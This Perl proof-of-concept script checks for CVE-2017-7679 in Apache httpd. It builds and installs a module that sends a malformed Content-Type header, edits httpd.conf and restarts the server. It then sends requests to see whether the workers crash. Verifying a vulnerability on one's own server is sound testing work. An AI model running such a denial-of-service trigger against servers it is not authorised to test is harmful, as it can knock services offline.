#!/usr/bin/perl
# Michael Gottburg - https://github.com/gottburgm/
use 5.10.0;
use strict;
use warnings;
no warnings 'experimental';
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Cookies;
use HTTP::Response;
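# Global Variables / entry point.
# Both arguments are mandatory; help() exits, so nothing below runs without them.
my $url            = $ARGV[0] or help();
my $apache_install = $ARGV[1] or help();

# buildModule() runs "$apache_install/bin/apxs" after changing into
# $apache_install, so a relative prefix would not resolve from there; the
# usage text already demands an absolute path, now it is enforced.
if ($apache_install !~ m{\A/}) {
    print "[!] Apache Install Path Must Be Absolute : $apache_install\n";
    help();
}
# Drop trailing slashes so "…/apache2/" does not turn into "…/apache2//conf".
$apache_install =~ s{(?<=.)/+\z}{};

if (-d $apache_install) {
    # Display The Header
    header();
    # Run The PoC
    exploit($apache_install, $url);
}
else {
    print "[!] Couldn't Read/Find : $apache_install\n";
    help();
}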
# Print the PoC banner (advisory summary) framed by two rules of '=' whose
# width matches the title line.
sub header {
    my $banner = "=================================[ CVE-2017-7679 ]=================================";
    my $rule   = '=' x length $banner;

    print "\n\n";
    print <<"BANNER";

$banner
Reporter : ChenQin and Hanno Böck
Date : 2017-06-20
CVE : CVE-2017-7679
Description :
In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, mod_mime
can read one byte past the end of a buffer when sending a malicious
Content-Type response header.
BANNER
    print "$rule\n\n";
}
# Print the usage text (with the script's own name from $0) and terminate;
# this never returns.
sub help {
    my $script = $0;

    print "\n";
    print <<"USAGE";

Usage : perl $script <URL> <APACHE_INSTALL_PATH>
---------------------------------------------------------
[EXAMPLE] perl $script http://localhost:1337/ /usr/local/apache2
Note: Apache Install Path Must Be Absolute.
USAGE
    print "\n\n";
    exit;
}
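# Build the LWP::UserAgent used for every request.
#   $useragent - User-Agent string ('' in the only caller)
#   $timeout   - per-request timeout in seconds
#   $proxy     - optional proxy URL; false/undef means direct connection
# Returns the configured LWP::UserAgent.
sub buildRequester {
    my ($useragent, $timeout, $proxy) = @_;
    $proxy //= 0;

    # In-memory cookie jar. The original persisted cookies to the fixed,
    # world-writable path /tmp/cookies.lwp with autosave on, so another local
    # user could pre-create or symlink that name and have this script write
    # through it; nothing here needs cookies to survive between runs.
    my $cookie_jar = HTTP::Cookies->new();

    my $browser = LWP::UserAgent->new();
    $browser->protocols_allowed([qw(http https ftp)]);
    # POST is redirectable on purpose here (LWP's default is GET/HEAD only).
    $browser->requests_redirectable(['GET', 'POST', 'HEAD', 'OPTIONS']);
    $browser->cookie_jar($cookie_jar);

    ### Custom Options
    $browser->timeout($timeout);
    $browser->agent($useragent);
    $browser->proxy([qw(http https ftp ftps)] => $proxy) if $proxy;

    return $browser;
}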
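# Build an HTTP::Request.
#   $url          - target URL
#   $method       - HTTP method, case-insensitive
#   $payload      - query string (GET) or request body (anything else); may be undef
#   $content_type - Content-Type header; false/undef falls back to form-urlencoded
# Returns the HTTP::Request.
sub buildRequest {
    my ($url, $method, $payload, $content_type) = @_;

    $content_type = 'application/x-www-form-urlencoded'
        unless defined $content_type && $content_type;
    # The original tested $content_type here instead of $payload, so an undef
    # payload was only defaulted by accident (the second operand was always false).
    $payload = '' unless defined $payload;
    $method = uc $method;

    my $request;
    if ($method eq 'GET') {
        # Only append a query string when there is something to send; the
        # original always appended "?", producing ".../?" for an empty payload.
        my $target = $url;
        if (length $payload) {
            $target .= ($target =~ /\?/ ? '&' : '?') . $payload;
        }
        $request = HTTP::Request->new($method, $target);
    }
    else {
        $request = HTTP::Request->new($method, $url);
        $request->content($payload);
    }
    $request->content_type($content_type);

    return $request;
}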
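# Run the PoC: build and install the mod_CVE_2017_7679 module into the local
# httpd at $apache_install (see buildModule), then request the handler URL
# twice and report whether the server stopped answering.
#   $apache_install - absolute httpd install prefix
#   $url            - base URL of that httpd; "CVE_2017_7679/" is appended
# Side effects: modifies/restores conf/httpd.conf, restarts httpd (via buildModule).
sub exploit {
    my ($apache_install, $url) = @_;
    my $name    = "CVE_2017_7679";
    my $timeout = 30;

    ### Setting Up The Requester
    my $browser = buildRequester('', $timeout, 0);
    # Original concatenated blindly, so "http://host:1337" became
    # "http://host:1337CVE_2017_7679/".
    $url .= '/' unless $url =~ m{/\z};
    $url .= "$name/";

    buildModule($apache_install, $name);

    print "[*] Sending GET Request On : $url\n";
    my $response = $browser->request(buildRequest($url, 'GET', '', 0));
    print "\tResponse Code : " . $response->code
        . "\n\tResponse Content :\n\t" . $response->content . "\n\n";

    my $first = _classify_response($response);
    if ($first eq 'unreachable') {
        # The original treated LWP's own "500 Can't connect" exactly like a
        # crashed worker; a target that was never reachable proves nothing.
        print "[-] Target Unreachable (" . $response->status_line . ") ; Result Inconclusive .\n";
    }
    elsif ($first ne 'ok') {
        print "[*] Server Seems To Be Affected ... Confirming ...\n";
    }

    print "[*] Sending Second Request To Check If The Denial Of Service Worked On : $url\n";
    $response = $browser->request(buildRequest($url, 'GET', '', 0));
    print "\tResponse Code : " . $response->code . " (" . $response->status_line . ")\n\n";

    my $second = _classify_response($response);
    if ($second eq 'unreachable') {
        print "[-] Target Unreachable (" . $response->status_line . ") ; Result Inconclusive .\n";
    }
    elsif ($second ne 'ok') {
        print "[+] Server Is Affected .\n";
    }
    else {
        print "[-] Server Is NOT Affected .\n";
    }

    _restore_config($apache_install);
}

# Classify what an LWP response says about the target:
#   'unreachable' - LWP-synthesised error whose status line says it could not
#                   connect at all (no server answered)
#   'dropped'     - any other LWP-synthesised error (connection closed or reset
#                   after it was opened) — from the client side, what a worker
#                   dying mid-request looks like
#   'error'       - a genuine HTTP 5xx sent by httpd
#   'ok'          - anything else
# LWP marks responses it generated itself with "Client-Warning: Internal response".
sub _classify_response {
    my ($response) = @_;
    my $synthetic = ($response->header('Client-Warning') // '') eq 'Internal response';
    if ($synthetic) {
        return $response->status_line =~ /Can't connect/ ? 'unreachable' : 'dropped';
    }
    return $response->code =~ /\A5\d\d\z/ ? 'error' : 'ok';
}

# Put the httpd.conf saved by buildModule back in place, if there is one.
sub _restore_config {
    my ($apache_install) = @_;
    my $conf   = "$apache_install/conf/httpd.conf";
    my $backup = "$conf.backup";
    return unless -f $backup;

    print "[*] Recovering Apache Configuration File From Backup : $backup\n";
    # rename(2) instead of a shell "mv": the install path is never word-split
    # or interpreted by a shell.
    rename $backup, $conf or print "[-] Couldn't Restore $conf : $!\n";
    # NOTE: buildModule restarted httpd with the PoC module loaded and nothing
    # restarts it here, so the module stays active until the next restart.
}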
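# Generate, compile and install the PoC Apache module, wire its handler into
# httpd.conf (after backing the file up) and restart httpd.
#   $apache_install - absolute httpd install prefix (must contain bin/apxs)
#   $name           - module short name; "mod_$name" is the module
# Expects src/mod_template.tpl and src/mod_$name.conf relative to the cwd.
# Exits (after a message) on any missing prerequisite, as the original did.
# All external commands run without a shell, so $apache_install is never
# word-split or interpreted (the original interpolated it into system()).
sub buildModule {
    my ($apache_install, $name) = @_;
    my $module_name          = "mod_$name";
    my $template_file        = 'mod_template.tpl';   # original had a stray "," here
    my $config_file          = "$module_name.conf";
    my $module_file          = "$module_name.c";
    my $module_template_path = "src/$template_file";
    my $config_template_path = "src/$config_file";
    my $module_dir           = "$apache_install/$name";
    my $apxs                 = "$apache_install/bin/apxs";
    my $httpd_conf           = "$apache_install/conf/httpd.conf";
    my $httpd_conf_backup    = "$httpd_conf.backup";
    # malicious content type; the two characters backslash + "0" are presumably
    # meant to become a C "\0" escape once pasted into the template's string
    # literal — confirm against src/mod_template.tpl
    my $content_type = "text/htmla\\0 ";

    ### Preconditions, checked before anything on disk is touched
    unless (-f $apxs && -f $module_template_path && -f $config_template_path) {
        print "[-] Error : APXS And/Or Module File Not Found .\n";
        exit;
    }
    print "[+] APXS Found : $apxs\n";

    ### Build Apache Module source from the template
    print "[*] Building Module $module_name From Template : $module_template_path\n";
    my @module_content = _fill_template($module_template_path, {
        '__NAME__'         => $name,
        '__MODULE-NAME__'  => $module_name,
        '__CONTENT-TYPE__' => $content_type,
    });

    print "[*] Writting Module In : $module_dir\n";
    _run('rm', '-rf', $module_dir) if -d $module_dir;
    # "apxs -g" creates ./$name under its cwd, so run it from $apache_install;
    # the chdir happens in the child only — the relative src/ paths above
    # depend on this process keeping its cwd.
    _run_in($apache_install, $apxs, '-g', '-n', $name);
    unless (-d $module_dir) {
        print "[-] Couldn't Write : $module_dir\n";
        exit;
    }
    write_file("$module_dir/$module_file", @module_content);

    ### Directory the handler is served from
    my $public_dir = _public_dir($apache_install);
    unless (-d "$public_dir/$name") {
        print "[*] Creating Web Directory For Handler : $public_dir/$name\n";
        mkdir "$public_dir/$name" or die "[-] Couldn't Create $public_dir/$name : $!\n";
    }

    ### Back up httpd.conf — but never overwrite a backup left behind by an
    ### interrupted run: the live httpd.conf may already carry that run's edits.
    if (-f $httpd_conf_backup) {
        print "[!] Backup Already Exists, Keeping It : $httpd_conf_backup\n";
    }
    else {
        print "[*] Backuping Apache Configuration File : $httpd_conf => $httpd_conf_backup\n";
        _run('cp', $httpd_conf, $httpd_conf_backup)
            or die "[-] Couldn't Back Up $httpd_conf\n";
    }

    my @config_content = _fill_template($config_template_path, { '__NAME__' => $name });

    ### Compile + install; "-a" is what adds the LoadModule line append_after anchors on,
    ### so a failed build must not fall through (the original ignored the exit status).
    print "[*] Compiling Module ...\n";
    unless (_run($apxs, '-i', '-a', '-c', "$module_dir/$module_file")) {
        print "[-] Module Compilation Failed ; Restoring Configuration .\n";
        rename $httpd_conf_backup, $httpd_conf
            or print "[-] Couldn't Restore $httpd_conf : $!\n";
        exit;
    }
    print "[*] Adding Module Configuration Into Apache Configuration : $httpd_conf\n";
    append_after($httpd_conf, "LoadModule $name", @config_content);
    write_file("$module_dir/$config_file", @config_content);

    print "[*] Restarting Apache ...\n";
    _run("$apache_install/bin/apachectl", 'restart')
        or print "[-] Apache Restart Failed .\n";
}

# Read a template and replace every placeholder key of %$subst on every line
# (the original's if/elsif chain replaced only the first kind found per line).
# Each returned line ends in exactly one "\n".
sub _fill_template {
    my ($path, $subst) = @_;
    my @out;
    for my $line (read_file($path, 1)) {
        for my $key (keys %$subst) {
            my $value = $subst->{$key};
            $line =~ s/\Q$key\E/$value/gi;
        }
        push @out, "$line\n";
    }
    return @out;
}

# htdocs (classic layout) or html; exits with the original message when neither exists.
sub _public_dir {
    my ($apache_install) = @_;
    for my $candidate (qw(htdocs html)) {
        return "$apache_install/$candidate" if -d "$apache_install/$candidate";
    }
    print "[-] Couldn't Locate Apache Public Directory ...\n";
    exit;
}

# Run a command as an argv list (no shell); true iff it exited 0.
sub _run {
    my @cmd = @_;
    return system({ $cmd[0] } @cmd) == 0;
}

# Like _run, but the child chdirs into $dir first; the parent's cwd is untouched.
sub _run_in {
    my ($dir, @cmd) = @_;
    my $pid = fork();
    die "[-] fork Failed : $!\n" unless defined $pid;
    if ($pid == 0) {
        chdir $dir or die "[-] chdir $dir Failed : $!\n";
        exec { $cmd[0] } @cmd or die "[-] exec $cmd[0] Failed : $!\n";
    }
    waitpid($pid, 0);
    return $? == 0;
}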
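# Insert @append_lines into $file directly after every line that contains
# $string (case-insensitive). $string is matched literally — it is an anchor
# such as "LoadModule CVE_2017_7679", not a pattern, so it is quotemeta'd
# (the original interpolated it raw into the regex).
#   $file         - path rewritten in place via read_file/write_file
#   $string       - literal text to look for
#   @append_lines - lines to insert; a trailing newline on each is normalised
#                   to exactly one (the original doubled it)
sub append_after {
    my ($file, $string, @append_lines) = @_;
    my $anchor = qr/\Q$string\E/i;
    my @new_content;
    my $hits = 0;

    for my $line (read_file($file, 1)) {
        push @new_content, "$line\n";
        next unless $line =~ $anchor;
        $hits++;
        push @new_content, map { my $copy = $_; chomp $copy; "$copy\n" } @append_lines;
    }
    # Silent no-op here would leave the handler unconfigured without any hint
    # (e.g. when "apxs -a" did not add the LoadModule line).
    print "[-] Anchor '$string' Not Found In $file ; Nothing Appended .\n" unless $hits;

    write_file($file, @new_content);
}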
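# Read $file and return its lines as a list.
#   $file  - path to read
#   $chomp - when true, strip the trailing newline from every line (default: keep)
# Dies with a message (and $!) when the file cannot be opened.
sub read_file {
    my ($file, $chomp) = @_;
    $chomp //= 0;

    # Three-arg open with an explicit '<': the original two-arg form let a
    # filename starting with ">" or "|" change the open mode.
    open my $fh, '<', $file or die "[-] $file Couldn't Be Read : $!\n";
    my @content = <$fh>;
    close $fh;

    chomp @content if $chomp;
    return @content;
}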
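# Write @content to $file, truncating it first.
#   $file    - path to create/overwrite
#   @content - lines (with their own newlines); undef and empty entries are skipped
# Dies with a message (and $!) on open, write or close failure — the original
# reported $@ (the eval error, empty here) and never checked close, where
# buffered write errors such as ENOSPC surface.
sub write_file {
    my ($file, @content) = @_;

    open my $fh, '>', $file or die "[-] $file Couldn't Be Open : $!\n";
    for my $line (@content) {
        # the original used plain truthiness, which also dropped a bare "0"
        next unless defined $line && length $line;
        print {$fh} $line or die "[-] $file Write Failed : $!\n";
    }
    close $fh or die "[-] $file Couldn't Be Closed : $!\n";
}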